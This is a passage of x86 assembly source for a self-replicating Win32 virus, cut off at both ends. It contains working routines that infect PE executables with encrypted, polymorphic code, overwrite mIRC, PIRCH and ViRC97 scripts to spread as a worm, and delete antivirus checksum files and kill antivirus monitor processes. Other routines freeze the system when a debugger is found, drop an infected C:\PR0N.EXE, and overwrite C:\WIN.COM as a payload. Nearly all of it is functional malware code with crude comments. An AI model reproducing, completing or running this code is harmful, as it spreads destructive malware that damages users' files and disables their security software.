jc nomoretosearch ; time, and the user could
|
|||
|
lea esi,[ebp+key_PIRCH] ; notice our presence :)
|
|||
|
call RegExist
|
|||
|
jc nomoretosearch
|
|||
|
lea esi,[ebp+key_ViRC97]
|
|||
|
call RegExist
|
|||
|
jc nomoretosearch
|
|||
|
xor ebx,ebx ; Clear counter
|
|||
|
|
|||
|
findfirstdir:
|
|||
|
lea edi,[ebp+_WIN32_FIND_DATA] ; Search for directories
|
|||
|
push edi
|
|||
|
lea eax,[ebp+ALL_MASK]
|
|||
|
push eax
|
|||
|
apicall _FindFirstFileA
|
|||
|
cmp_ eax,notfoundfirstdir
|
|||
|
|
|||
|
mov dword ptr [ebp+TSHandle],eax
|
|||
|
|
|||
|
main_trav:
|
|||
|
cmp dword ptr [ebp+_WFD_dwFileAttributes],directory_attr
|
|||
|
jnz findnextdir
|
|||
|
|
|||
|
lea eax,[ebp+_WFD_szFileName]
|
|||
|
cmp byte ptr [eax],"." ; Is dir "." or ".."?
|
|||
|
jz findnextdir ; Shitz
|
|||
|
|
|||
|
push eax
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
|
|||
|
pushad
|
|||
|
call Worms ; Let's rock!
|
|||
|
popad
|
|||
|
|
|||
|
push dword ptr [ebp+TSHandle] ; Save handle
|
|||
|
inc ebx ; Increase counter :)
|
|||
|
jmp findfirstdir
|
|||
|
findnextdir:
|
|||
|
push edi ; Search for another dir
|
|||
|
push dword ptr [ebp+TSHandle]
|
|||
|
apicall _FindNextFileA
|
|||
|
cmpz eax,notfoundfirstdir
|
|||
|
|
|||
|
jmp main_trav
|
|||
|
notfoundfirstdir:
|
|||
|
lea eax,[ebp+dotdot] ; Go back 1 dir
|
|||
|
push eax
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
|
|||
|
or ebx,ebx ; Are we in root? yeah, it's
|
|||
|
jz nomoretosearch ; over! our search finished!
|
|||
|
|
|||
|
dec ebx ; Decrease countah
|
|||
|
pop dword ptr [ebp+TSHandle]
|
|||
|
jmp findnextdir
|
|||
|
|
|||
|
notfoundnextdir:
|
|||
|
push dword ptr [ebp+TSHandle]
|
|||
|
apicall _FindClose
|
|||
|
jmp notfoundfirstdir
|
|||
|
|
|||
|
nomoretosearch:
|
|||
|
lea esi,[ebp+key_PIRCH] ; Mark all registry keys...
|
|||
|
call PutReg
|
|||
|
lea esi,[ebp+key_mIRC]
|
|||
|
call PutReg
|
|||
|
lea esi,[ebp+key_ViRC97]
|
|||
|
call PutReg
|
|||
|
|
|||
|
lea esi,[ebp+tempcurdir] ; And put current directory
|
|||
|
push esi ; back :)
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Thorin,Dori,Nori,Ori,Balin,Dwalin,Fili,Kili,Oin,Gloin,"
|
|||
|
db "Bifur,Bofur,Bombur]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Worms (mIRC & PIRCH) installer
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
Worms:
|
|||
|
call DeleteShit ; Delete AV CRCs from all dir
|
|||
|
push 80h ; We test for the presence of
|
|||
|
lea eax,[ebp+PirchWormFile] ; the scripts by setting a
|
|||
|
push eax ; normal attribute to them.
|
|||
|
apicall _SetFileAttributesA ; If the api returns us an
|
|||
|
xchg eax,ecx ; error, then we know the
|
|||
|
jecxz TryWithMIRC ; file doesn't exist :)
|
|||
|
jmp BorrowPIRCH ; As in DOS! ;)
|
|||
|
TryWithMIRC:
|
|||
|
push 80h
|
|||
|
lea eax,[ebp+mIRCWormFile]
|
|||
|
push eax
|
|||
|
apicall _SetFileAttributesA
|
|||
|
xchg eax,ecx
|
|||
|
jecxz TryWithViRC97
|
|||
|
jmp BorrowMIRC
|
|||
|
TryWithViRC97:
|
|||
|
push 80h
|
|||
|
lea eax,[ebp+ViRC97WormFile]
|
|||
|
push eax
|
|||
|
apicall _SetFileAttributesA
|
|||
|
xchg eax,ecx
|
|||
|
jecxz ExitWorms
|
|||
|
jmp BorrowViRC97
|
|||
|
ExitWorms:
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PIRCH script overwrite
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
BorrowPIRCH: ; If file found, drop the
|
|||
|
xor eax,eax ; new script file
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h
|
|||
|
call _PIRCH
|
|||
|
|
|||
|
PirchWormFile db "events.ini",0 ; What to overwrite
|
|||
|
|
|||
|
_PIRCH: apicall _CreateFileA
|
|||
|
|
|||
|
mov dword ptr [ebp+TempHandle],eax
|
|||
|
|
|||
|
push 00000000h ; Overwrite with our script :)
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push PirchWormSize
|
|||
|
lea ebx,[ebp+PirchWorm]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
|
|||
|
mov ecx,PirchWormSize ; And trunc the file, so there
|
|||
|
call TruncFile ; won't be more shit ;)
|
|||
|
|
|||
|
push dword ptr [ebp+TempHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; mIRC script overwrite
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
BorrowMIRC: ; Same as above, but with
|
|||
|
xor eax,eax ; mIRC scripts
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h
|
|||
|
call _mIRC
|
|||
|
|
|||
|
mIRCWormFile db "mirc.ini",0
|
|||
|
|
|||
|
_mIRC: apicall _CreateFileA
|
|||
|
|
|||
|
mov dword ptr [ebp+TempHandle],eax
|
|||
|
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push mIRCWormSize
|
|||
|
lea ebx,[ebp+mIRCWorm]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
|
|||
|
mov ecx,mIRCWormSize
|
|||
|
call TruncFile
|
|||
|
|
|||
|
push dword ptr [ebp+TempHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; ViRC97 script overwrite
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
BorrowViRC97: ; Same as above, but with
|
|||
|
xor eax,eax ; ViRC97 scripts
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h
|
|||
|
call _ViRC97
|
|||
|
|
|||
|
ViRC97WormFile db "default.lib",0
|
|||
|
|
|||
|
_ViRC97:apicall _CreateFileA
|
|||
|
|
|||
|
mov dword ptr [ebp+TempHandle],eax
|
|||
|
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push ViRC97WormSize
|
|||
|
lea ebx,[ebp+ViRC97Worm]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
|
|||
|
mov ecx,ViRC97WormSize
|
|||
|
call TruncFile
|
|||
|
|
|||
|
push dword ptr [ebp+TempHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Unpack, drop and infect our PE file [TROJAN mode]
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
DropPR0N:
|
|||
|
push drop_old_size ; Allocate some memory
|
|||
|
push 00000000h
|
|||
|
apicall _GlobalAlloc
|
|||
|
cmpz eax,_ExitDropPR0N
|
|||
|
mov dword ptr [ebp+GlobalAllocHnd],ecx
|
|||
|
|
|||
|
mov edi,dropper_size ; Unpack in allocated memory
|
|||
|
xchg edi,ecx ; the dropper
|
|||
|
lea esi,[ebp+dropper]
|
|||
|
call LSCE_UnPack
|
|||
|
|
|||
|
push 00000000h ; Create the dropper on
|
|||
|
push 00000080h ; C:\PR0N.EXE (hi darkman!) ;)
|
|||
|
push 00000002h
|
|||
|
push 00000000h
|
|||
|
push 00000001h
|
|||
|
push 40000000h
|
|||
|
call _PR0N
|
|||
|
|
|||
|
pr0nfile db "C:\PR0N.EXE",0
|
|||
|
|
|||
|
_ExitDropPR0N:
|
|||
|
jmp ExitDropPR0N
|
|||
|
|
|||
|
_PR0N: apicall _CreateFileA
|
|||
|
|
|||
|
push eax ; Write it, sucka!
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push drop_old_size
|
|||
|
push dword ptr [ebp+GlobalAllocHnd]
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
lea edi,[ebp+pr0nfile] ; Infect it
|
|||
|
call _Infection
|
|||
|
|
|||
|
push dword ptr [ebp+GlobalAllocHnd] ; And free allocated memory
|
|||
|
apicall _GlobalFree
|
|||
|
ExitDropPR0N:
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Self protect virus againist debuggers
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
AntiDebugger:
|
|||
|
apicall _GetVersion ; Check for Win95, as it dont
|
|||
|
cmp eax,80000000h ; have the IsDebuggerPresent
|
|||
|
jb BetterNot ; API.
|
|||
|
|
|||
|
cmp ax,0A04h
|
|||
|
jb BetterNot
|
|||
|
|
|||
|
lea esi,[ebp+@IsDebuggerPresent]
|
|||
|
call GetAPI_ET
|
|||
|
call eax ; Are we being debugged? Shit!
|
|||
|
cmpz eax,BetterNot
|
|||
|
|
|||
|
cli ; Who said that Windoze don't
|
|||
|
jmp $-1 ; use interrupts? ;) Int8 rlz
|
|||
|
|
|||
|
BetterNot:
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Dedicated to all Tolkien fans over the middle-earth]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Kill AV CRC files
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
DeleteShit:
|
|||
|
pushad
|
|||
|
lea edi,[ebp+@@BadPhilez] ; Load pointer to first file
|
|||
|
mov ecx,bad_number ; Number of files to erase
|
|||
|
|
|||
|
killem: push ecx ; Save the number
|
|||
|
push edi ; Push file to erase
|
|||
|
apicall _DeleteFileA ; Delete it!
|
|||
|
pop ecx ; Restore the number
|
|||
|
xor al,al ; Get the next file
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
loop killem ; Loop and delete another :)
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Kill the processes of determinated AV monitors
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
KillMonitors:
|
|||
|
lea edi,[ebp+Monitors2Kill]
|
|||
|
KM_L00p:
|
|||
|
call TerminateProc
|
|||
|
xor al,al ; Reach the end of string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
cmp byte ptr [edi],0BBh ; Last item of array?
|
|||
|
jnz KM_L00p
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Avoid infection of certain files
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to file name
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it exist, to 0 if it doesn't
|
|||
|
;
|
|||
|
|
|||
|
AvoidShitFiles:
|
|||
|
lea esi,[ebp+@@BadProgramz] ; Ptr to table
|
|||
|
ASF_Loop:
|
|||
|
xor eax,eax ; Clear EAX
|
|||
|
lodsb ; Load size of string in AL
|
|||
|
cmp al,0BBh ; End of table?
|
|||
|
jz AllShitFilesProcessed ; Oh, shit!
|
|||
|
xchg eax,ecx ; Put Size in ECX
|
|||
|
push edi ; Preserve program pointer
|
|||
|
rep cmpsb ; Compare both strings
|
|||
|
pop edi ; Restore program pointer
|
|||
|
jz ShitFileFound ; Damn, a shitty file!
|
|||
|
add esi,ecx ; Pointer to another string
|
|||
|
jmp ASF_Loop ; in table & loop
|
|||
|
AllShitFilesProcessed:
|
|||
|
mov cl,00h ; Overlap, so CL = 0F9h
|
|||
|
org $-1
|
|||
|
ShitFileFound:
|
|||
|
stc ; Set carry
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PE Infection (with parameters)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to file name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
_Infection:
|
|||
|
push edi
|
|||
|
apicall _GetFileAttributesA
|
|||
|
cmp_ eax,_ExitInfection
|
|||
|
mov dword ptr [ebp+WFD_dwFileAttributes],eax
|
|||
|
|
|||
|
mov esi,edi
|
|||
|
call OpenFile
|
|||
|
cmp_ eax,_ExitInfection
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
push 00000000h
|
|||
|
push eax
|
|||
|
apicall _GetFileSize
|
|||
|
mov dword ptr [ebp+WFD_nFileSizeLow],eax
|
|||
|
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
lea esi,[ebp+WFD_szFileName]
|
|||
|
xchg esi,edi
|
|||
|
duhast: lodsb
|
|||
|
or al,al
|
|||
|
jz engel
|
|||
|
stosb
|
|||
|
jmp duhast
|
|||
|
engel: stosb
|
|||
|
push dword ptr [ebp+NewEIP]
|
|||
|
push dword ptr [ebp+OldEIP]
|
|||
|
push dword ptr [ebp+ModBase]
|
|||
|
call Infection
|
|||
|
pop dword ptr [ebp+ModBase]
|
|||
|
pop dword ptr [ebp+OldEIP]
|
|||
|
pop dword ptr [ebp+NewEIP]
|
|||
|
|
|||
|
mov cl,00h ; Overlapppppp
|
|||
|
org $-1
|
|||
|
_ExitInfection:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PE Infection (with WIN32_FIND_DATA)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing (everything needed is in WFD structure).
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
Infection:
|
|||
|
lea esi,[ebp+WFD_szFileName] ; Get FileName to infect
|
|||
|
push 80h
|
|||
|
push esi
|
|||
|
apicall _SetFileAttributesA ; Wipe its attributes
|
|||
|
|
|||
|
call OpenFile ; Open it
|
|||
|
|
|||
|
cmp_ eax,CantOpen
|
|||
|
mov dword ptr [ebp+FileHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; 1st we create map with
|
|||
|
call CreateMap ; its exact size
|
|||
|
cmpz_ eax,CloseFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
|
|||
|
call MapFile ; Map it
|
|||
|
cmpz_ eax,UnMapFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapAddress],eax
|
|||
|
|
|||
|
mov esi,eax ; Get PE Header
|
|||
|
mov esi,[esi+3Ch]
|
|||
|
add esi,eax
|
|||
|
cmp dword ptr [esi],"EP" ; Is it PE?
|
|||
|
jnz NoInfect
|
|||
|
|
|||
|
cmp dword ptr [esi+mark],ddInfMark ; Was it infected?
|
|||
|
jz NoInfect
|
|||
|
|
|||
|
push dword ptr [ebp+MapAddress]
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
push dword ptr [ebp+MapHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; And Map all again.
|
|||
|
add ecx,virus_size
|
|||
|
call CreateMap
|
|||
|
cmpz_ eax,CloseFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
|
|||
|
add ecx,virus_size
|
|||
|
call MapFile
|
|||
|
cmpz_ eax,UnMapFile
|
|||
|
mov dword ptr [ebp+MapAddress],eax
|
|||
|
|
|||
|
mov esi,eax
|
|||
|
mov esi,[eax+3Ch]
|
|||
|
add esi,eax
|
|||
|
|
|||
|
call GetLastSection ; ESI = Last Section
|
|||
|
; EDI = PE header
|
|||
|
|
|||
|
mov eax,[edi+28h] ; Save original EIP
|
|||
|
mov dword ptr [ebp+OldEIP],eax
|
|||
|
|
|||
|
mov edx,[esi+10h]
|
|||
|
mov ebx,edx
|
|||
|
add edx,[esi+14h] ; EDX = Phisical address where
|
|||
|
; append virus
|
|||
|
|
|||
|
push edx
|
|||
|
|
|||
|
mov eax,ebx
|
|||
|
add eax,[esi+0Ch] ; EAX = VA of new EIP
|
|||
|
mov [edi+28h],eax ; Set the new entrypoint
|
|||
|
mov dword ptr [ebp+NewEIP],eax
|
|||
|
|
|||
|
mov eax,[esi+10h] ; Retrieve new SizeOfRawData
|
|||
|
add eax,virus_size ; and VirtualSize
|
|||
|
mov ecx,[edi+3Ch]
|
|||
|
call Align
|
|||
|
|
|||
|
mov [esi+10h],eax ; Set new SizeOfRawData
|
|||
|
mov [esi+08h],eax ; Set new VirtualSize
|
|||
|
|
|||
|
pop edx
|
|||
|
|
|||
|
mov eax,[esi+10h] ; Set new SizeOfImage
|
|||
|
add eax,[esi+0Ch]
|
|||
|
mov [edi+50h],eax
|
|||
|
|
|||
|
and dword ptr [edi+0A0h],00h ; Nulify the relocs, so they
|
|||
|
and dword ptr [edi+0A4h],00h ; won't fuck us :)
|
|||
|
|
|||
|
or dword ptr [esi+24h],section_flags ; Set new section attributes
|
|||
|
|
|||
|
mov dword ptr [edi+mark],ddInfMark ; Mark infected files
|
|||
|
|
|||
|
push dword ptr [ebp+WFD_nFileSizeLow]
|
|||
|
pop dword ptr [edi+orig_size] ; Store orig. size for stealth
|
|||
|
|
|||
|
push dword ptr [edi+3Ch]
|
|||
|
push dword ptr [ebp+infections]
|
|||
|
and dword ptr [ebp+infections],00h
|
|||
|
|
|||
|
; Some RDA stuff
|
|||
|
|
|||
|
push edi esi edx ; Save ESI and EDI for later
|
|||
|
lea esi,[ebp+crypto]
|
|||
|
mov edi,encrypt_size
|
|||
|
call CRC32 ; Obtain virus CRC32
|
|||
|
pop edx esi edi
|
|||
|
mov dword ptr [ebp+CRC],eax ; Store it
|
|||
|
|
|||
|
push edx
|
|||
|
apicall _GetTickCount ; Get a random number as seed
|
|||
|
xchg ebx,eax ; for RDA encryption
|
|||
|
pop edx
|
|||
|
|
|||
|
; Append virus & RDA encryption
|
|||
|
|
|||
|
mov edi,dword ptr [ebp+MapAddress] ; Write non crypted part
|
|||
|
add edi,edx
|
|||
|
push edi
|
|||
|
lea esi,[ebp+virus_start]
|
|||
|
mov ecx,non_crypt_size
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov ecx,encrypt_size ; Encrypt and copy the rest
|
|||
|
cryptl: lodsb
|
|||
|
xor al,bl
|
|||
|
stosb
|
|||
|
loop cryptl
|
|||
|
pop edi
|
|||
|
|
|||
|
; Poly decryptor generation
|
|||
|
|
|||
|
lea eax,[ebp+random_seed] ; Get a slow seed for poly
|
|||
|
push eax
|
|||
|
apicall _GetSystemTime
|
|||
|
|
|||
|
mov eax,poly_virus_size ; Obtain exactly a reliable
|
|||
|
mov ecx,4 ; value of virus_size divided
|
|||
|
call Align ; by 4
|
|||
|
shr eax,2
|
|||
|
xchg eax,ecx
|
|||
|
|
|||
|
mov esi,edi
|
|||
|
add esi,LIMIT
|
|||
|
call THME ; generate the poly decryptor
|
|||
|
|
|||
|
pop dword ptr [ebp+infections]
|
|||
|
|
|||
|
mov eax,edi ; Trunc file
|
|||
|
sub eax,dword ptr [ebp+MapAddress]
|
|||
|
pop ecx
|
|||
|
call Align
|
|||
|
xchg eax,ecx
|
|||
|
call TruncFile
|
|||
|
|
|||
|
jmp UnMapFile
|
|||
|
NoInfect:
|
|||
|
stc
|
|||
|
dec byte ptr [ebp+infections] ; Shit, if we are here,
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; something failed :(
|
|||
|
call TruncFile
|
|||
|
|
|||
|
UnMapFile:
|
|||
|
push dword ptr [ebp+MapAddress] ; Close map view of file
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
CloseMap:
|
|||
|
push dword ptr [ebp+MapHandle] ; Close map handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
CloseFile:
|
|||
|
push dword ptr [ebp+FileHandle] ; Close file handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
CantOpen:
|
|||
|
push dword ptr [ebp+WFD_dwFileAttributes]
|
|||
|
lea eax,[ebp+WFD_szFileName] ; Restore old attributes
|
|||
|
push eax
|
|||
|
apicall _SetFileAttributesA
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Welcome to the Middle-Earth, my dear friend]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Tiny method for get KERNEL32 base address
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Program return address
|
|||
|
; ECX = Limit of pages where search
|
|||
|
; output:
|
|||
|
; EAX = Base address of KERNEL32.dll
|
|||
|
;
|
|||
|
|
|||
|
GetK32 proc ; My own little GetK32 :)
|
|||
|
and esi,0FFFF0000h
|
|||
|
_@1: jecxz WeFailed ; Thanx to Super for the idea
|
|||
|
cmp word ptr [esi],"ZM" ; and Qozah for notifying me
|
|||
|
jz CheckPE ; a little error (Thnx man!)
|
|||
|
_@2: sub esi,10000h
|
|||
|
dec ecx
|
|||
|
jmp _@1
|
|||
|
|
|||
|
CheckPE:
|
|||
|
mov edi,[esi+3Ch]
|
|||
|
add edi,esi
|
|||
|
cmp dword ptr [edi],"EP"
|
|||
|
jz WeGotK32
|
|||
|
jmp _@2
|
|||
|
WeFailed:
|
|||
|
cmp byte ptr [ebp+inNT],00h ; Otherwise, hardcode to the
|
|||
|
jz W9X ; proper OS.
|
|||
|
mov esi,kernel_wNT ; NT = 77F00000h
|
|||
|
jmp WeGotK32
|
|||
|
W9X: mov esi,kernel_ ; 9X = BFF70000h
|
|||
|
WeGotK32:
|
|||
|
xchg eax,esi
|
|||
|
ret
|
|||
|
GetK32 endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve API addresses (from Export Table)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to where you want the first API Address
|
|||
|
; ESI = Pointer to the first API Name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
GetAPIs proc
|
|||
|
@@1: push esi
|
|||
|
push edi
|
|||
|
call GetAPI_ET
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
xor al,al
|
|||
|
@@2: scasb
|
|||
|
jnz @@2
|
|||
|
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
@@3: cmp byte ptr [esi],0BBh
|
|||
|
jz @@4
|
|||
|
jmp @@1
|
|||
|
@@4: ret
|
|||
|
GetAPIs endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve API address (from Export Table)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to API Name
|
|||
|
; output:
|
|||
|
; EAX = API address
|
|||
|
;
|
|||
|
|
|||
|
GetAPI_ET proc
|
|||
|
mov edx,esi
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
xor al,al
|
|||
|
@_1: scasb
|
|||
|
jnz @_1
|
|||
|
|
|||
|
sub edi,esi ; EDI = API Name size
|
|||
|
mov ecx,edi
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov esi,3Ch
|
|||
|
rva2va esi,kernel
|
|||
|
|
|||
|
lodsw
|
|||
|
rva2va eax,kernel
|
|||
|
|
|||
|
mov esi,[eax+78h]
|
|||
|
add esi,1Ch
|
|||
|
rva2va esi,kernel
|
|||
|
|
|||
|
lodsd
|
|||
|
rva2va eax,kernel
|
|||
|
mov dword ptr [ebp+AddressTableVA],eax
|
|||
|
lodsd
|
|||
|
|
|||
|
rva2va eax,kernel
|
|||
|
push eax ; mov [NameTableVA],eax =)
|
|||
|
lodsd
|
|||
|
|
|||
|
rva2va eax,kernel
|
|||
|
|
|||
|
mov dword ptr [ebp+OrdinalTableVA],eax
|
|||
|
pop esi
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
@_3: push esi
|
|||
|
lodsd
|
|||
|
|
|||
|
rva2va eax,kernel
|
|||
|
mov esi,eax
|
|||
|
mov edi,edx
|
|||
|
|
|||
|
push ecx
|
|||
|
cld
|
|||
|
rep cmpsb
|
|||
|
pop ecx
|
|||
|
jz @_4
|
|||
|
pop esi
|
|||
|
add esi,4
|
|||
|
inc ebx
|
|||
|
jmp @_3
|
|||
|
|
|||
|
@_4:
|
|||
|
pop esi
|
|||
|
xchg eax,ebx
|
|||
|
shl eax,1
|
|||
|
add eax,dword ptr [ebp+OrdinalTableVA]
|
|||
|
xor esi,esi
|
|||
|
xchg eax,esi
|
|||
|
lodsw
|
|||
|
shl eax,2
|
|||
|
add eax,dword ptr [ebp+AddressTableVA]
|
|||
|
xchg esi,eax
|
|||
|
lodsd
|
|||
|
rva2va eax,kernel
|
|||
|
ret
|
|||
|
GetAPI_ET endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve API address (from Import Table)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Offset of API address to retrieve
|
|||
|
; output:
|
|||
|
; EAX = Address of the API
|
|||
|
; EBX = Address of the API address in the import
|
|||
|
;
|
|||
|
|
|||
|
GetAPI_IT proc
|
|||
|
mov dword ptr [ebp+TempGA_IT1],edi
|
|||
|
mov ebx,edi
|
|||
|
xor al,al
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
sub edi,ebx
|
|||
|
|
|||
|
mov dword ptr [ebp+TempGA_IT2],edi
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov esi,dword ptr [ebp+imagebase]
|
|||
|
add esi,3Ch
|
|||
|
lodsw
|
|||
|
add eax,dword ptr [ebp+imagebase]
|
|||
|
xchg esi,eax
|
|||
|
lodsd
|
|||
|
|
|||
|
cmp eax,"EP"
|
|||
|
jnz nopes
|
|||
|
|
|||
|
add esi,7Ch
|
|||
|
lodsd
|
|||
|
push eax
|
|||
|
lodsd
|
|||
|
mov ecx,eax
|
|||
|
pop esi
|
|||
|
add esi,dword ptr [ebp+imagebase]
|
|||
|
|
|||
|
SearchK32:
|
|||
|
push esi
|
|||
|
mov esi,[esi+0Ch]
|
|||
|
add esi,dword ptr [ebp+imagebase]
|
|||
|
lea edi,[ebp+K32_DLL]
|
|||
|
mov ecx,K32_Size
|
|||
|
cld
|
|||
|
push ecx
|
|||
|
rep cmpsb
|
|||
|
pop ecx
|
|||
|
pop esi
|
|||
|
jz gotcha
|
|||
|
add esi,14h
|
|||
|
jmp SearchK32
|
|||
|
gotcha:
|
|||
|
cmp byte ptr [esi],00h
|
|||
|
jz nopes
|
|||
|
mov edx,[esi+10h]
|
|||
|
add edx,dword ptr [ebp+imagebase]
|
|||
|
lodsd
|
|||
|
jz nopes
|
|||
|
|
|||
|
xchg edx,eax
|
|||
|
add edx,[ebp+imagebase]
|
|||
|
xor ebx,ebx
|
|||
|
loopy:
|
|||
|
cmp dword ptr [edx+00h],00h
|
|||
|
jz nopes
|
|||
|
cmp byte ptr [edx+03h],80h
|
|||
|
jz reloop
|
|||
|
|
|||
|
mov edi,dword ptr [ebp+TempGA_IT1]
|
|||
|
mov ecx,dword ptr [ebp+TempGA_IT2]
|
|||
|
mov esi,[edx]
|
|||
|
add esi,dword ptr [ebp+imagebase]
|
|||
|
add esi,2
|
|||
|
push ecx
|
|||
|
rep cmpsb
|
|||
|
pop ecx
|
|||
|
jz wegotit
|
|||
|
reloop:
|
|||
|
inc ebx
|
|||
|
add edx,4
|
|||
|
loop loopy
|
|||
|
wegotit:
|
|||
|
shl ebx,2
|
|||
|
add ebx,eax
|
|||
|
mov eax,[ebx]
|
|||
|
db 0B1h
|
|||
|
nopes:
|
|||
|
stc
|
|||
|
ret
|
|||
|
GetAPI_IT endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Payloads
|
|||
|
; ===========================================================================
|
|||
|
; White trash get down on your knees... and you'll get cake and sodomy!
|
|||
|
|
|||
|
payload proc
|
|||
|
apicall _GetTickCount ; Get a random payload
|
|||
|
and eax,payload_number
|
|||
|
lea esi,[ebp+payload_table+eax*4]
|
|||
|
lodsd
|
|||
|
add eax,ebp
|
|||
|
call eax ; Call to it
|
|||
|
ret
|
|||
|
payload endp
|
|||
|
|
|||
|
payload1 proc
|
|||
|
push 00000000h ; Mmm, a new win.com :)
|
|||
|
push 00000080h
|
|||
|
push 00000002h
|
|||
|
push 00000000h
|
|||
|
push 00000001h
|
|||
|
push 40000000h
|
|||
|
call ___
|
|||
|
db "C:\WIN.COM",0
|
|||
|
___: apicall _CreateFileA
|
|||
|
push eax
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push p_size
|
|||
|
lea ebx,[ebp+payl0ad]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
